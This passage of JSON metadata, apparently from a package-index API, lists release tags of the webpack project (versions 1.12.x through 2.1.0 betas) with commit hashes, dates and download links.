l":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4